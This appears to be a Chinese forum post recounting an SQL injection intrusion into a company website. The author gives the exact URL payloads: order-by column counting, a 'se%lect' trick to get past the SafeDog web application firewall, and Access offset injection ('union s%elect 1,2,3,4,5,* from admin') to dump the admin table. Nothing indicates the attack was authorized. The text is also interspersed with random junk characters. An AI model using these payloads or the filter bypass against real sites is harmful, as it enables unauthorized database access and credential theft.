打开网站,一个企业站。/ D0 E2 V# ~* Q% I9 }
' e0 E) I4 B' f, f( v8 w1 x/ v$ E: H( Y7 K- y" E2 `) X
顺手加个admin
" ~& h7 ?# Z9 Q3 }" a% ^, o. D/ z4 T5 t) n/ G
6 |% l6 l( H' L' Q/ [( U2 S( {
默认后台。9 u% p: X+ L8 P1 }/ c
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。
6 s7 @* a) R" ]8 B* v- j) n" L% f" \( L( _( F: d0 C% z/ ` u& X
% Z% V- ^, x) A- {- W$ Y
+ y0 I6 Q/ u6 y5 x所以就不用御剑扫了,待会直接封IP。7 _! \) \1 y( ]8 O
7 U+ |' e: w! H) n1 L用order by语句判断是否存在注入。' O5 f) V% v- F( X F( O
http://www.xxx.com /product_show.asp?id=997 order by 17 I2 T& }0 r) v! y( y
http://www.xxx.com /product_show.asp?id=997 order by 100* c# J1 ]% g! c8 ~8 F0 k
现在存在注入,经测试后发现是9个字段。
$ _0 m* }' k! Q- R, h9 T $ G8 m- ^) o0 _- V" w6 o9 y
接下来进行联合查询,猜是否存在admin表。+ {: N; x1 ^3 j% g% r) R7 ^& }
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。4 b9 h* A' Y/ D1 M. n
; K% e. B, c7 _% ^# \- ?" {" `& p! R/ K
& w' h [. N( H0 [在select中间加个%,se%lect绕过安全狗。5 O: {" z5 E5 R7 K K
9 }/ J* z; w3 p( k6 K
, L6 u0 i4 h5 h) T发现存在admin表,然后开始手工猜常用的字段。; |) G5 }( h! r/ U; S" x1 \ V) L" H
纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
; d1 ~, i$ b0 r9 X; o! O7 m
* n- H' |8 b! S突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。
8 v v5 G; i9 M- Q# m m) | $ M$ s4 \+ g. ?! s3 f
科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
" h- w6 k; H w- {2 n9 Zhttp://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
: g7 \/ ^4 I$ i7 T3 G+ \; t好了,敏感内容出显了。$ Z; ?. S$ A) v& a) K4 i
7 I$ P, y9 P( m- ^( L8 S; P3 ~" _3 y( Y* i; f
, [ C0 Q$ J% S9 s; @
|